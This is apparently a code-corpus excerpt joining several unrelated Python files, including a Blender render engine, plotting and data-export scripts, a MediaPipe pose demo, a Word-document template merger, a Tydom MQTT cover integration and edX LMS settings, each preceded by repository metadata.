We should improve this by implementing sync_update() try: if self.is_preview: engine_cls = PreviewEngine elif self.is_animation: engine_cls = animation_engine_cls[depsgraph.scene.rpr.render_quality] else: engine_cls = render_engine_cls[depsgraph.scene.rpr.render_quality] self.engine = engine_cls(self) self.engine.sync(depsgraph) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) self.error_set(f"ERROR | {e}. Please see log for more details.") def render(self, depsgraph): """ Called with final render and preview """ log("render", self.as_pointer()) try: self.engine.render() except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) self.error_set(f"ERROR | {e}. Please see log for more details.") # This has to be called in the end of render due to possible memory leak RPRBLND-1635 # Important to call it in this function, not in __del__() self.engine.stop_render() # viewport render def view_update(self, context, depsgraph): """ Called when data is updated for viewport """ log('view_update', self.as_pointer()) try: # if there is no engine set, create it and do the initial sync engine_cls = viewport_engine_cls[depsgraph.scene.rpr.render_quality] if self.engine and type(self.engine) == engine_cls: self.engine.sync_update(context, depsgraph) return if self.engine: self.engine.stop_render() self.engine = engine_cls(self) self.engine.sync(context, depsgraph) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) def view_draw(self, context, depsgraph): """ called when viewport is to be drawn """ log('view_draw', self.as_pointer()) try: self.engine.draw(context) except Exception as e: log.error(e, 'EXCEPTION:', traceback.format_exc()) # view layer AOVs def update_render_passes(self, render_scene=None, render_layer=None): """ Update 'Render Layers' compositor node with active render passes info. Called by Blender. 
""" aovs = properties.view_layer.RPR_ViewLayerProperites.aovs_info cryptomatte_aovs = properties.view_layer.RPR_ViewLayerProperites.cryptomatte_aovs_info scene = render_scene if render_scene else bpy.context.scene layer = render_layer if render_scene else bpy.context.view_layer def do_register_pass(aov): pass_channel = aov['channel'] pass_name = aov['name'] pass_channels_size = len(pass_channel) # convert from channel to blender type blender_type = 'VALUE' if pass_channel in ('RGB', 'RGBA'): blender_type = 'COLOR' elif pass_channel in {'XYZ', 'UVA'}: blender_type = 'VECTOR' self.register_pass(scene, layer, pass_name, pass_channels_size, pass_channel, blender_type) for index, enabled in enumerate(layer.rpr.enable_aovs): if enabled: do_register_pass(aovs[index]) if layer.rpr.crytomatte_aov_material: for i in range(3): do_register_pass(cryptomatte_aovs[i]) if layer.rpr.crytomatte_aov_object: for i in range(3,6): do_register_pass(cryptomatte_aovs[i]) @bpy.app.handlers.persistent def on_version_update(*args, **kwargs): """ On scene loading update old RPR data to current version """ log("on_version_update") addon_version = bl_info['version'] if version_updater.is_scene_from_2_79(addon_version): version_updater.update_2_79_scene() @bpy.app.handlers.persistent def on_save_pre(*args, **kwargs): """ Handler on saving a blend file (before) """ log("on_save_pre") # Save current plugin version in scene bpy.context.scene.rpr.saved_addon_version = bl_info['version'] @bpy.app.handlers.persistent def on_load_pre(*args, **kwargs): """ Handler on loading a blend file (before) """ log("on_load_pre") utils.clear_temp_dir() def register(): """ Register all addon classes in Blender """ log("register") install_libs.ensure_boto3() bpy.utils.register_class(RPREngine) material_library.register() properties.register() operators.register() nodes.register() ui.register() bpy.app.handlers.save_pre.append(on_save_pre) bpy.app.handlers.load_pre.append(on_load_pre) 
bpy.app.handlers.version_update.append(on_version_update) def unregister(): """ Unregister all addon classes from Blender """ log("unregister") bpy.app.handlers.version_update.remove(on_version_update) bpy.app.handlers.load_pre.remove(on_load_pre) bpy.app.handlers.save_pre.remove(on_save_pre) ui.unregister() nodes.unregister() operators.unregister() properties.unregister() material_library.unregister() bpy.utils.unregister_class(RPREngine)
1.546875
2
plot_metric_err_vs_dim.py
wchen459/design_embeddings_jmd_2016
9
16734
""" Plots reconstruction error vs semantic space dimensionality Usage: python metric_err_vs_dim.py Author(s): <NAME> (<EMAIL>) """ import matplotlib.pyplot as plt import numpy as np plt.rc("font", size=18) examples = ['glass', 'sf_linear', 'sf_s_nonlinear', 'sf_v_nonlinear'] titles = {'glass': 'Glass', 'sf_linear': 'Superformula (linear)', 'sf_s_nonlinear': 'Superformula (slightly nonlinear)', 'sf_v_nonlinear': 'Superformula (very nonlinear)'} n = len(examples) x = range(1, 6) for i in range(n): plt.figure() plt.xticks(np.arange(min(x), max(x)+1, dtype=np.int)) plt.xlabel('Semantic space dimensionality') plt.ylabel('Reconstruction error') plt.xlim(0.5, 5.5) errs = np.zeros((3,5)) for j in x: # Read reconstruction errors in rec_err.txt txtfile = open('./results/'+examples[i]+'/n_samples = 115/n_control_points = 20/semantic_dim = ' +str(j)+'/rec_err.txt', 'r') k = 0 for line in txtfile: errs[k, j-1] = float(line) k += 1 line_pca, = plt.plot(x, errs[0], '-ob', label='PCA') line_kpca, = plt.plot(x, errs[1], '-vg', label='Kernel PCA') line_ae, = plt.plot(x, errs[2], '-sr', label='Autoencoder') plt.legend(handles=[line_pca, line_kpca, line_ae], fontsize=16) plt.title(titles[examples[i]]) fig_name = 'err_vs_dim_'+examples[i]+'.png' plt.tight_layout() plt.savefig('./results/'+fig_name, dpi=300) print fig_name+' saved!'
2.265625
2
tools/pot/openvino/tools/pot/graph/gpu_patterns.py
ryanloney/openvino-1
1,127
16735
# Copyright (C) 2020-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 from .pattern_utils import check_fused_scale_shift_patterns, get_fused_scale_shift_patterns, \ check_fused_op_const_patterns, get_fused_op_const_pattern, get_clamp_mult_const_pattern def get_gpu_ignored_patterns(): return { 'blocks': [(pattern, check_fused_scale_shift_patterns) for pattern in get_fused_scale_shift_patterns()] + [(pattern, check_fused_op_const_patterns) for pattern in get_fused_op_const_pattern()], 'activations': [get_clamp_mult_const_pattern()], 'inputs': [] }
1.679688
2
test/environments/instances/8x8/gen.py
Multi-Agent-Research-Group/hog2
5
16736
<reponame>Multi-Agent-Research-Group/hog2<gh_stars>1-10 #!/usr/bin/python import random import os import errno for i in range(100): s=set() g=set() while len(s) < 50: s.add((random.randint(0,7),random.randint(0,7))) while len(g) < 50: g.add((random.randint(0,7),random.randint(0,7))) start=list(s) goal=list(g) for size in range(21,50): if not os.path.exists("./%d"%size): try: os.makedirs("./%d"%size) except OSError as exc: if exc.errno != errno.EEXIST: raise with open("./%d/%d.csv"%(size,i), "w") as f: for j in range(size): f.write("%d,%d %d,%d\n"%(start[j][0],start[j][1],goal[j][0],goal[j][1]))
2.4375
2
pose_recognition_from_camera_demo.py
amazingchow/capture-dance-using-mediapipe
0
16737
<gh_stars>0 # -*- coding: utf-8 -*- import argparse import cv2 as cv import mediapipe as mp import sys import time if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--video_device", type=int, default=0) parser.add_argument("--video_file", type=str, default="") args = parser.parse_args() mp_pose = mp.solutions.pose mp_drawing = mp.solutions.drawing_utils with mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose: cap = object() if args.video_file != "": cap = cv.VideoCapture(args.video_file) else: cap = cv.VideoCapture(args.video_device) if not cap.isOpened(): print("Cannot open camera device-0") sys.exit(-1) else: print("Video <width: {}, height: {}, fps: {}>".format( cap.get(cv.CAP_PROP_FRAME_WIDTH), cap.get(cv.CAP_PROP_FRAME_HEIGHT), cap.get(cv.CAP_PROP_FPS) )) fps = int(cap.get(cv.CAP_PROP_FPS)) frame_idx = 0 while 1: ret, frame = cap.read() if not ret: print("Cannot receive frame, exiting ...") break frame_idx += 1 st = time.time() # flip the frame horizontally for a later selfie-view display frame = cv.cvtColor(cv.flip(frame, 1), cv.COLOR_BGR2RGB) # to improve performance, optionally mark the frame as not writeable to pass by reference frame.flags.writeable = False results = pose.process(frame) frame.flags.writeable = True frame = cv.cvtColor(frame, cv.COLOR_RGB2BGR) # draw the pose annotation on the frame mp_drawing.draw_landmarks(frame, results.pose_landmarks, mp_pose.POSE_CONNECTIONS) ed = time.time() print("Used {:.3f} secs to process frame-{:05}".format(ed - st, frame_idx)) gap = 1000//fps - int(1000 * (ed - st)) if gap < 5: gap = 5 cv.imshow("pose_recognition_from_camera_demo", frame) if cv.waitKey(gap) & 0xFF == 27: break cap.release() cv.destroyAllWindows()
2.4375
2
reference/data_dict_export.py
TBody/atomic1D
1
16738
# Program name: atomic1D/reference/build_json.py # Author: <NAME> # Author email: <EMAIL> # Date of creation: 14 July 2017 # # # Makes data_dict and copies it into a .json file 'sd1d-case-05.json' filename = 'sd1d-case-05' from boutdata.collect import collect data_dict = {} # Normalisation factor for temperature - T * Tnorm returns in eV data_dict["Tnorm"] = collect("Tnorm") # Normalisation factor for density - N * Nnorm returns in m^-3 data_dict["Nnorm"] = collect("Nnorm") # Plasma pressure (normalised). Pe = 2 Ne Te => P/Ne = Te (and assume Ti=Te) data_dict["P"] = collect("P") # Electron density (normalised) data_dict["Ne"] = collect("Ne") # Neutral density (normalised) data_dict["Nn"] = collect("Nn") # Help for user data_dict["help"] = "Contains outputs from Boutprojects/SD1D/case-05 example. Created with data_dict_export.py - stored in Github.com/TBody/atomic1D/reference" from copy import deepcopy import numpy as np import json # Need to 'jsonify' the numpy arrays (i.e. convert to nested lists) so that they can be stored in plain-text # Deep-copy data to a new dictionary and then edit that one (i.e. break the data pointer association - keep data_dict unchanged in case you want to run a copy-verify on it) data_dict_jsonified = deepcopy(data_dict) numpy_ndarrays = []; for key, element in data_dict.items(): if type(element) == np.ndarray: # Store which keys correspond to numpy.ndarray, so that you can de-jsonify the arrays when reading numpy_ndarrays.append(key) data_dict_jsonified[key] = data_dict_jsonified[key].tolist() data_dict_jsonified['numpy_ndarrays'] = numpy_ndarrays # Encode help # >> data_dict['help'] = 'help string' # <<Use original filename, except with .json instead of .dat extension>> with open('{}.json'.format(filename),'w') as fp: json.dump(data_dict_jsonified, fp, sort_keys=True, indent=4)
2.578125
3
wordDocComposite.py
flyonok/image2text
0
16739
<gh_stars>0 from docx import Document def CompositeTwoDocs(srcDocFullName, dstDocFullName, compositeName): ''' srcDocFullName:源文档,里面含有需要替换的内容 dstDocFullName:目标文档,执行后,相关模板内容被替换 compositeName:替换的对象名,比如正面或背面 return: 成功->True,失败->False ''' try: srcDoc = Document(srcDocFullName) dstDoc = Document(dstDocFullName) srcParasMap = {} # Heading 2 => [paras list] dstParasMap = {} # Heading 2 => [paras list] firstPage = False secondPage = False currentLabelStyleContent = None # 当前标签样式对应的内容 # 查找源文档的相关内容 for srcPara in srcDoc.paragraphs: if (srcPara.style.name.find('Heading 2') >= 0 and srcPara.text.find(compositeName) >= 0): print('find {0}'.format(srcPara)) firstPage = True elif (srcPara.style.name.find('Heading 2') >= 0 and firstPage): secondPage = True break else: if (firstPage and not secondPage): if (srcPara.style.name.find('Heading 3') >= 0): srcParasMap[srcPara.text] = [] currentLabelStyleContent = srcPara.text else: if currentLabelStyleContent is None: raise ValueError('不合格的word模板文档!') srcParasMap[currentLabelStyleContent].append(srcPara) firstPage = False secondPage = False currentLabelStyleContent = None # 当前标签样式对应的内容 # 查找目标文档的相关内容 for dstPara in dstDoc.paragraphs: if (dstPara.style.name.find('Heading 2') >= 0 and dstPara.text.find(compositeName) >= 0): print('find {0}'.format(dstPara)) firstPage = True elif (dstPara.style.name.find('Heading 2') >= 0 and firstPage): secondPage = True break else: if (firstPage and not secondPage): if (dstPara.style.name.find('Heading 3') >= 0): dstParasMap[dstPara.text] = [] currentLabelStyleContent = dstPara.text else: if currentLabelStyleContent is None: raise ValueError('不合格的word模板文档!') dstParasMap[currentLabelStyleContent].append(dstPara) # 开始组合 for key, dstParas in dstParasMap.items(): srcParas = srcParasMap[key] if len(srcParas) <= 0: print('源文档中没有该项--{0}--内容'.format(key)) continue else: for index, item in enumerate(dstParas): if (index <= len(srcParas)): dstParas[index].text = srcParas[index].text else: 
print('{0}中的长度--{1}--已经大于源文档的总长度--{2}'.format(key, index, len(srcParas))) dstDoc.save(dstDocFullName) except Exception as e: print('出现错误...') print(e) return False return True if __name__ == '__main__': srcDocFullName = r'D:\秒秒学人工智能平台\2020年8月\名片-111\名片-111.docx' dstDocFullName = r'D:\秒秒学人工智能平台\2020年8月\名片-456\名片-456.docx' CompositeTwoDocs(srcDocFullName, dstDocFullName, '正面')
2.6875
3
app/cover.py
mrwiwi/tydom2mqtt
26
16740
<filename>app/cover.py import json import time from datetime import datetime from sensors import sensor cover_command_topic = "cover/tydom/{id}/set_positionCmd" cover_config_topic = "homeassistant/cover/tydom/{id}/config" cover_position_topic = "cover/tydom/{id}/current_position" cover_set_postion_topic = "cover/tydom/{id}/set_position" cover_attributes_topic = "cover/tydom/{id}/attributes" class Cover: def __init__(self, tydom_attributes, set_position=None, mqtt=None): self.attributes = tydom_attributes self.device_id = self.attributes['device_id'] self.endpoint_id = self.attributes['endpoint_id'] self.id = self.attributes['id'] self.name = self.attributes['cover_name'] self.current_position = self.attributes['position'] self.set_position = set_position self.mqtt = mqtt # def id(self): # return self.id # def name(self): # return self.name # def current_position(self): # return self.current_position # def set_position(self): # return self.set_position # def attributes(self): # return self.attributes async def setup(self): self.device = {} self.device['manufacturer'] = 'Delta Dore' self.device['model'] = 'Volet' self.device['name'] = self.name self.device['identifiers'] = self.id self.config_topic = cover_config_topic.format(id=self.id) self.config = {} self.config['name'] = self.name self.config['unique_id'] = self.id # self.config['attributes'] = self.attributes self.config['command_topic'] = cover_command_topic.format(id=self.id) self.config['set_position_topic'] = cover_set_postion_topic.format( id=self.id) self.config['position_topic'] = cover_position_topic.format(id=self.id) self.config['json_attributes_topic'] = cover_attributes_topic.format( id=self.id) self.config['payload_open'] = "UP" self.config['payload_close'] = "DOWN" self.config['payload_stop'] = "STOP" self.config['retain'] = 'false' self.config['device'] = self.device # print(self.config) if (self.mqtt is not None): self.mqtt.mqtt_client.publish( self.config_topic, json.dumps( self.config), qos=0) 
# setup_pub = '(self.config_topic, json.dumps(self.config), qos=0)' # return(setup_pub) async def update(self): await self.setup() try: await self.update_sensors() except Exception as e: print("Cover sensors Error :") print(e) self.position_topic = cover_position_topic.format( id=self.id, current_position=self.current_position) if (self.mqtt is not None): self.mqtt.mqtt_client.publish( self.position_topic, self.current_position, qos=0, retain=True) # self.mqtt.mqtt_client.publish('homeassistant/sensor/tydom/last_update', str(datetime.fromtimestamp(time.time())), qos=1, retain=True) self.mqtt.mqtt_client.publish( self.config['json_attributes_topic'], self.attributes, qos=0) print( "Cover created / updated : ", self.name, self.id, self.current_position) # update_pub = '(self.position_topic, self.current_position, qos=0, retain=True)' # return(update_pub) async def update_sensors(self): # print('test sensors !') for i, j in self.attributes.items(): # sensor_name = "tydom_alarm_sensor_"+i # print("name "+sensor_name, "elem_name "+i, "attributes_topic_from_device ",self.config['json_attributes_topic'], "mqtt",self.mqtt) if not i == 'device_type' or not i == 'id': new_sensor = None new_sensor = sensor( elem_name=i, tydom_attributes_payload=self.attributes, attributes_topic_from_device=self.config['json_attributes_topic'], mqtt=self.mqtt) await new_sensor.update() # def __init__(self, name, elem_name, tydom_attributes_payload, # attributes_topic_from_device, mqtt=None): async def put_position(tydom_client, device_id, cover_id, position): print(cover_id, 'position', position) if not (position == ''): await tydom_client.put_devices_data(device_id, cover_id, 'position', position) async def put_positionCmd(tydom_client, device_id, cover_id, positionCmd): print(cover_id, 'positionCmd', positionCmd) if not (positionCmd == ''): await tydom_client.put_devices_data(device_id, cover_id, 'positionCmd', positionCmd)
2.625
3
edx/config/lms/docker_run.py
openfun/learning-analytics-playground
1
16741
""" This is the default template for our main set of servers. This does NOT cover the content machines, which use content.py Common traits: * Use memcached, and cache-backed sessions * Use a MySQL 5.1 database """ # We intentionally define lots of variables that aren't used, and # want to import all variables from base settings files # pylint: disable=wildcard-import, unused-wildcard-import # Pylint gets confused by path.py instances, which report themselves as class # objects. As a result, pylint applies the wrong regex in validating names, # and throws spurious errors. Therefore, we disable invalid-name checking. # pylint: disable=invalid-name import datetime import dateutil from glob import glob import json import os from path import Path as path import pkgutil import platform from django.utils.translation import ugettext_lazy from django.conf import global_settings from celery_redis_sentinel import register from openedx.core.lib.logsettings import get_logger_config from path import Path as path from xmodule.modulestore.modulestore_settings import ( convert_module_store_setting_if_needed, update_module_store_settings, ) from ..common import * from .utils import Configuration, prefer_fun_video # Load custom configuration parameters from yaml files config = Configuration(os.path.dirname(__file__)) # edX has now started using "settings.ENV_TOKENS" and "settings.AUTH_TOKENS" everywhere in the # project, not just in the settings. Let's make sure our settings still work in this case ENV_TOKENS = config AUTH_TOKENS = config # SERVICE_VARIANT specifies name of the variant used, which decides what JSON # configuration files are read during startup. SERVICE_VARIANT = config("SERVICE_VARIANT", default=None) # CONFIG_ROOT specifies the directory where the JSON configuration # files are expected to be found. If not specified, use the project # directory. 
CONFIG_ROOT = path(config("CONFIG_ROOT", default=ENV_ROOT)) # CONFIG_PREFIX specifies the prefix of the JSON configuration files, # based on the service variant. If no variant is use, don't use a # prefix. CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else "" ################################ ALWAYS THE SAME ############################## RELEASE = config("RELEASE", default=None) DEBUG = False DEFAULT_TEMPLATE_ENGINE["OPTIONS"]["debug"] = False # IMPORTANT: With this enabled, the server must always be behind a proxy that # strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise, # a user can fool our server into thinking it was an https connection. # See # https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header # for other warnings. SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https") ###################################### CELERY ################################ CELERY_ALWAYS_EAGER = config("CELERY_ALWAYS_EAGER", default=False, formatter=bool) # Don't use a connection pool, since connections are dropped by ELB. BROKER_POOL_LIMIT = 0 BROKER_CONNECTION_TIMEOUT = 1 # For the Result Store, use the django cache named 'celery' CELERY_RESULT_BACKEND = config( "CELERY_RESULT_BACKEND", default="djcelery.backends.cache:CacheBackend" ) # When the broker is behind an ELB, use a heartbeat to refresh the # connection and to detect if it has been dropped. 
BROKER_HEARTBEAT = 60.0 BROKER_HEARTBEAT_CHECKRATE = 2 # Each worker should only fetch one message at a time CELERYD_PREFETCH_MULTIPLIER = 1 # Celery queues DEFAULT_PRIORITY_QUEUE = config( "DEFAULT_PRIORITY_QUEUE", default="edx.lms.core.default" ) HIGH_PRIORITY_QUEUE = config("HIGH_PRIORITY_QUEUE", default="edx.lms.core.high") LOW_PRIORITY_QUEUE = config("LOW_PRIORITY_QUEUE", default="edx.lms.core.low") HIGH_MEM_QUEUE = config("HIGH_MEM_QUEUE", default="edx.lms.core.high_mem") CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE CELERY_QUEUES = config( "CELERY_QUEUES", default={ DEFAULT_PRIORITY_QUEUE: {}, HIGH_PRIORITY_QUEUE: {}, LOW_PRIORITY_QUEUE: {}, HIGH_MEM_QUEUE: {}, }, formatter=json.loads, ) CELERY_ROUTES = "lms.celery.Router" # Force accepted content to "json" only. If we also accept pickle-serialized # messages, the worker will crash when it's running with a privileged user (even # if it's not the root user but a user belonging to the root group, which is our # case with OpenShift). CELERY_ACCEPT_CONTENT = ["json"] CELERYBEAT_SCHEDULE = {} # For scheduling tasks, entries can be added to this dict ########################## NON-SECURE ENV CONFIG ############################## # Things like server locations, ports, etc. STATIC_ROOT_BASE = path("/edx/app/edxapp/staticfiles") STATIC_ROOT = STATIC_ROOT_BASE STATIC_URL = "/static/" STATICFILES_STORAGE = config( "STATICFILES_STORAGE", default="lms.envs.fun.storage.CDNProductionStorage" ) CDN_BASE_URL = config("CDN_BASE_URL", default=None) MEDIA_ROOT = path("/edx/var/edxapp/media/") MEDIA_URL = "/media/" # DEFAULT_COURSE_ABOUT_IMAGE_URL specifies the default image to show for courses that don't provide one DEFAULT_COURSE_ABOUT_IMAGE_URL = config( "DEFAULT_COURSE_ABOUT_IMAGE_URL", default=DEFAULT_COURSE_ABOUT_IMAGE_URL ) PLATFORM_NAME = config("PLATFORM_NAME", default=PLATFORM_NAME) # For displaying on the receipt. 
At Stanford PLATFORM_NAME != MERCHANT_NAME, but PLATFORM_NAME is a fine default PLATFORM_TWITTER_ACCOUNT = config( "PLATFORM_TWITTER_ACCOUNT", default=PLATFORM_TWITTER_ACCOUNT ) PLATFORM_FACEBOOK_ACCOUNT = config( "PLATFORM_FACEBOOK_ACCOUNT", default=PLATFORM_FACEBOOK_ACCOUNT ) SOCIAL_SHARING_SETTINGS = config( "SOCIAL_SHARING_SETTINGS", default=SOCIAL_SHARING_SETTINGS, formatter=json.loads ) # Social media links for the page footer SOCIAL_MEDIA_FOOTER_URLS = config( "SOCIAL_MEDIA_FOOTER_URLS", default=SOCIAL_MEDIA_FOOTER_URLS, formatter=json.loads ) CC_MERCHANT_NAME = config("CC_MERCHANT_NAME", default=PLATFORM_NAME) EMAIL_BACKEND = config( "EMAIL_BACKEND", default="django.core.mail.backends.smtp.EmailBackend" ) EMAIL_FILE_PATH = config("EMAIL_FILE_PATH", default=None) EMAIL_HOST = config("EMAIL_HOST", default="localhost") EMAIL_PORT = config("EMAIL_PORT", default=25) # django default is 25 EMAIL_USE_TLS = config("EMAIL_USE_TLS", default=False) # django default is False HTTPS = config("HTTPS", default=HTTPS) SESSION_COOKIE_DOMAIN = config("SESSION_COOKIE_DOMAIN", default=None) SESSION_COOKIE_HTTPONLY = config( "SESSION_COOKIE_HTTPONLY", default=True, formatter=bool ) SESSION_COOKIE_SECURE = config( "SESSION_COOKIE_SECURE", default=SESSION_COOKIE_SECURE, formatter=bool ) SESSION_ENGINE = config("SESSION_ENGINE", default="redis_sessions.session") SESSION_SAVE_EVERY_REQUEST = config( "SESSION_SAVE_EVERY_REQUEST", default=SESSION_SAVE_EVERY_REQUEST, formatter=bool ) # Configuration to use session with redis # To use redis, change SESSION_ENGINE to "redis_sessions.session" SESSION_REDIS_HOST = config("SESSION_REDIS_HOST", default="redis") SESSION_REDIS_PORT = config("SESSION_REDIS_PORT", default=6379, formatter=int) SESSION_REDIS_DB = config("SESSION_REDIS_DB", default=1, formatter=int) SESSION_REDIS_PASSWORD = config("SESSION_REDIS_PASSWORD", default=None) SESSION_REDIS_PREFIX = config("SESSION_REDIS_PREFIX", default="session") SESSION_REDIS_SOCKET_TIMEOUT = config( 
"SESSION_REDIS_SOCKET_TIMEOUT", default=1, formatter=int ) SESSION_REDIS_RETRY_ON_TIMEOUT = config( "SESSION_REDIS_RETRY_ON_TIMEOUT", default=False, formatter=bool ) SESSION_REDIS = config( "SESSION_REDIS", default={ "host": SESSION_REDIS_HOST, "port": SESSION_REDIS_PORT, "db": SESSION_REDIS_DB, # db 0 is used for Celery Broker "password": SESSION_REDIS_PASSWORD, "prefix": SESSION_REDIS_PREFIX, "socket_timeout": SESSION_REDIS_SOCKET_TIMEOUT, "retry_on_timeout": SESSION_REDIS_RETRY_ON_TIMEOUT, }, formatter=json.loads, ) SESSION_REDIS_SENTINEL_LIST = config( "SESSION_REDIS_SENTINEL_LIST", default=None, formatter=json.loads ) SESSION_REDIS_SENTINEL_MASTER_ALIAS = config( "SESSION_REDIS_SENTINEL_MASTER_ALIAS", default=None ) REGISTRATION_EXTRA_FIELDS = config( "REGISTRATION_EXTRA_FIELDS", default=REGISTRATION_EXTRA_FIELDS, formatter=json.loads ) # Set the names of cookies shared with the marketing site # These have the same cookie domain as the session, which in production # usually includes subdomains. 
EDXMKTG_LOGGED_IN_COOKIE_NAME = config( "EDXMKTG_LOGGED_IN_COOKIE_NAME", default=EDXMKTG_LOGGED_IN_COOKIE_NAME ) EDXMKTG_USER_INFO_COOKIE_NAME = config( "EDXMKTG_USER_INFO_COOKIE_NAME", default=EDXMKTG_USER_INFO_COOKIE_NAME ) # Override feature by feature by whatever is being redefined in the settings.yaml file CONFIG_FEATURES = config("FEATURES", default={}, formatter=json.loads) FEATURES.update(CONFIG_FEATURES) LMS_BASE = config("LMS_BASE", default="localhost:8072") CMS_BASE = config("CMS_BASE", default="localhost:8082") LMS_ROOT_URL = config("LMS_ROOT_URL", default="http://{:s}".format(LMS_BASE)) LMS_INTERNAL_ROOT_URL = config("LMS_INTERNAL_ROOT_URL", default=LMS_ROOT_URL) SITE_NAME = config("SITE_NAME", default=LMS_BASE) ALLOWED_HOSTS = config( "ALLOWED_HOSTS", default=[LMS_BASE.split(":")[0]], formatter=json.loads ) if FEATURES.get("PREVIEW_LMS_BASE"): ALLOWED_HOSTS.append(FEATURES["PREVIEW_LMS_BASE"]) # allow for environments to specify what cookie name our login subsystem should use # this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can # happen with some browsers (e.g. 
Firefox) if config("SESSION_COOKIE_NAME", default=None): # NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this # being a str() SESSION_COOKIE_NAME = str(config("SESSION_COOKIE_NAME")) CACHE_REDIS_HOST = config("CACHE_REDIS_HOST", default="redis") CACHE_REDIS_PORT = config("CACHE_REDIS_PORT", default=6379, formatter=int) CACHE_REDIS_DB = config("CACHE_REDIS_DB", default=1, formatter=int) CACHE_REDIS_BACKEND = config( "CACHE_REDIS_BACKEND", default="django_redis.cache.RedisCache" ) CACHE_REDIS_URI = "redis://{}:{}/{}".format( CACHE_REDIS_HOST, CACHE_REDIS_PORT, CACHE_REDIS_DB ) CACHE_REDIS_CLIENT = config( "CACHE_REDIS_CLIENT", default="django_redis.client.DefaultClient" ) CACHES_DEFAULT_CONFIG = { "BACKEND": CACHE_REDIS_BACKEND, "LOCATION": CACHE_REDIS_URI, "OPTIONS": {"CLIENT_CLASS": CACHE_REDIS_CLIENT}, } if "Sentinel" in CACHE_REDIS_BACKEND: CACHES_DEFAULT_CONFIG["LOCATION"] = [(CACHE_REDIS_HOST, CACHE_REDIS_PORT)] CACHES_DEFAULT_CONFIG["OPTIONS"]["SENTINEL_SERVICE_NAME"] = config( "CACHE_REDIS_SENTINEL_SERVICE_NAME", default="mymaster" ) CACHES_DEFAULT_CONFIG["OPTIONS"]["REDIS_CLIENT_KWARGS"] = {"db": CACHE_REDIS_DB} CACHES = config( "CACHES", default={ "default": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "default"}), "general": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "general"}), "celery": dict(CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "celery"}), "mongo_metadata_inheritance": dict( CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "mongo_metadata_inheritance"} ), "openassessment_submissions": dict( CACHES_DEFAULT_CONFIG, **{"KEY_PREFIX": "openassessment_submissions"} ), "loc_cache": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "edx_location_mem_cache", }, # Cache backend used by Django 1.8 storage backend while processing static files "staticfiles": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "edx_location_mem_cache", }, }, formatter=json.loads, ) # Email overrides 
DEFAULT_FROM_EMAIL = config("DEFAULT_FROM_EMAIL", default=DEFAULT_FROM_EMAIL) DEFAULT_FEEDBACK_EMAIL = config( "DEFAULT_FEEDBACK_EMAIL", default=DEFAULT_FEEDBACK_EMAIL ) ADMINS = config("ADMINS", default=ADMINS, formatter=json.loads) SERVER_EMAIL = config("SERVER_EMAIL", default=SERVER_EMAIL) TECH_SUPPORT_EMAIL = config("TECH_SUPPORT_EMAIL", default=TECH_SUPPORT_EMAIL) CONTACT_EMAIL = config("CONTACT_EMAIL", default=CONTACT_EMAIL) BUGS_EMAIL = config("BUGS_EMAIL", default=BUGS_EMAIL) PAYMENT_SUPPORT_EMAIL = config("PAYMENT_SUPPORT_EMAIL", default=PAYMENT_SUPPORT_EMAIL) FINANCE_EMAIL = config("FINANCE_EMAIL", default=FINANCE_EMAIL) UNIVERSITY_EMAIL = config("UNIVERSITY_EMAIL", default=UNIVERSITY_EMAIL) PRESS_EMAIL = config("PRESS_EMAIL", default=PRESS_EMAIL) # Currency PAID_COURSE_REGISTRATION_CURRENCY = config( "PAID_COURSE_REGISTRATION_CURRENCY", default=["EUR", u"\N{euro sign}"] ) # Payment Report Settings PAYMENT_REPORT_GENERATOR_GROUP = config( "PAYMENT_REPORT_GENERATOR_GROUP", default=PAYMENT_REPORT_GENERATOR_GROUP ) # Bulk Email overrides BULK_EMAIL_DEFAULT_FROM_EMAIL = config( "BULK_EMAIL_DEFAULT_FROM_EMAIL", default=BULK_EMAIL_DEFAULT_FROM_EMAIL ) BULK_EMAIL_EMAILS_PER_TASK = config( "BULK_EMAIL_EMAILS_PER_TASK", default=BULK_EMAIL_EMAILS_PER_TASK, formatter=int ) BULK_EMAIL_DEFAULT_RETRY_DELAY = config( "BULK_EMAIL_DEFAULT_RETRY_DELAY", default=BULK_EMAIL_DEFAULT_RETRY_DELAY, formatter=int, ) BULK_EMAIL_MAX_RETRIES = config( "BULK_EMAIL_MAX_RETRIES", default=BULK_EMAIL_MAX_RETRIES, formatter=int ) BULK_EMAIL_INFINITE_RETRY_CAP = config( "BULK_EMAIL_INFINITE_RETRY_CAP", default=BULK_EMAIL_INFINITE_RETRY_CAP, formatter=int, ) BULK_EMAIL_LOG_SENT_EMAILS = config( "BULK_EMAIL_LOG_SENT_EMAILS", default=BULK_EMAIL_LOG_SENT_EMAILS, formatter=bool ) BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS = config( "BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS", default=BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS, formatter=int, ) # We want Bulk Email running on the high-priority queue, so we 
